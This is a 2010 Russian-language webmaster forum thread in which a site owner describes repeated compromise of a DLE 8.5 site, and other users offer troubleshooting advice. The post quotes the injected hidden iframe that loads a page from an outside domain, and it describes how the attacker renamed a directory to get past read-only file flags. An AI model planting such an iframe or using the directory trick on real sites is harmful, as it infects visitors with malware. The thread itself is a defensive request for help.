Взлом сайта на DLE

12 3
[Удален]
5288

Добрый день уважаемые форумчане.

02.06.2010 был взломан сайт. Версия DLE 8.5 лицензионная.

Принцип взлома следующий в файлы main.tpl прописывался левый ифрейм.

Либо же в файлы

<script type="text/javascript" src="/engine/classes/js/menu.js"></script>

<script type="text/javascript" src="/engine/classes/js/dle_ajax.js"></script>

<script type="text/javascript" src="/engine/classes/js/js_edit.js"></script>

<script type="text/javascript" src="/engine/classes/highslide/highslide.js"></script>

прописывался зашифрованный код, который тоже подгружал левый ифрем.

С яндекса начали приходить письма, мол на сайте вирус, и сайт будет выводиться в поиске с пометкой не безопастный .

Удалил код ифрейма. Сменил пароли везде, проверил на посторонние файлы. Все почистил. Сутки все ок, а потом сново вирус в файлах яваскрипта. Решил на все файлы куда прописывался вирус поставить права 0444 (только чтение). И попросил админов запретить изменение прав на все эти фалы.

На след день захожу и вижу сново прописанный код в файлах яваскрипта. На вопрос к аддминам как так получилоась? Полчил сдеж ответ.

Провели расследование и выяснили как были изменены файлы.
Злоумышленник не изменял файлы на которые мы установили приоритетный флаг, он просто переименовал директорию выше,
к примеру /site.ru/engine/classes/ была изменена на директорию /site.ru/engine/conf
Затем создал новую директорию site.ru/engine/classes/ скопировав туда все старые файлы уже без флага иммунитета
Тем самым уже внедрил вредоносный код в нужные файлы.

Снес полностью сайт, все посторонние модули убрал, только все что предлагает дле оставил.

ЗАлил оригинальные файлы с оф сайта дле. Попросил админов сменить пароли на все что можно, и не говорить мне (дабы исключить заряжение моегго компа хотя проверялся и КИС 2010 (лицензия) и ДР веб куриет). так и сделали. Сегодня утром проснулся и вижу на сайте сново вирус. Я в шоке и не знаю как дальше себя вести и что делать. Надеюсь найду помощь и ответы здесьь. Буду рад любому откликнувшемуся

Вот пример ифрейма.


[not-group=1,2,3] iframe src="http://miminus.ru/amg.cgi?stats" width="1" height="2" style="visibility: hidden;"> /iframe[/not-group]

скобки в iframe убрал

Все модули отключены реклама отключена , кроме маркетгида. ..

Да вот пример ифрейма.

Spartaco
На сайте с 13.09.2006
Offline
126
#1

хостеры виноваты. Если у них на фтп левый чувак может создавать директории с админскими правами, Вы хоть мильен раз снесите сайт - не поможет. Меняйте хостинг

[Удален]
#2

фтп отключен. Работает только сфтп и то ограничен с двух ип. Это мой домашний инет + ноутбук

Причем арендую собственный сервер + админы к нему.

F
На сайте с 16.01.2010
Offline
267
#3

Нельзя исключать взлом хостинга, тогда вы ничего не сделаете.

[Удален]
#4

админы сервера уже два раза просканили сервак на наличие шелов и вирусов. Результат отрицательный

Арендую собственный сервер + админы к нему.

budeniy
На сайте с 29.05.2010
Offline
41
#5

я хостюсь сейчас на хостинге где можно r52 shell (кажется так называется) и лазить по всем дерикториям сервера, можно зайти в любой каталог к левому дяде и творить чудеса. И этот хост я думаю не исключение, таких очень много. Запрет по ip тоже не показеть, опять тот же шелл залил и вперед.

Если тебе админы говорят что шелов нет (а доступ к фтп только по твоему ip), а на сайте та же самая ерунда происходит, то скорее всего админы работать не хотят. Хотя возможен реальный баг в DLE =(

Мое мнение админы лепят чушь =) залей дамп своего сайта на другой хост, смени DNS на домене и подожди =) повторится ли ситуация =) а там уже сравним настройки сервера и всего прочего, метом исключения найдем слабое место =) готов посадействовать, если интересно в ЛС контакты шли

budeniy добавил 04.07.2010 в 15:40

на эту тему http://dleshka.org.ru/main/1181-seryoznaya-uyazvimost-vsex-versij.html

описано как избавиться, кстати тоже советую попробовать

L
На сайте с 12.11.2009
Offline
79
#6
boomep:

Принцип взлома следующий в файлы main.tpl прописывался левый ифрейм.
...
Провели расследование и выяснили как были изменены файлы.
Злоумышленник не изменял файлы на которые мы установили приоритетный флаг, он просто переименовал директорию выше

:D

А спросить как злоумышленник попал на сервер религия не позволяет?

Складывается впечатление, что или админы над вами глумятся, или правда дебилы.

Karabasovsky
На сайте с 10.03.2009
Offline
91
#7
[Удален]
#8

пользуюсь для ходьбы по сфтп WinSCP 4.7

[Удален]
#9

Посмотрите на предмет левых юзеров на сервере и админов на сайте. Если возможно, переустановите сервер.

[Удален]
#10

Я первым делом это проверилд. НИ на сайте кроме аккаунта админа нету , ни на сервере кроме того под которым хожу я.

12 3

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий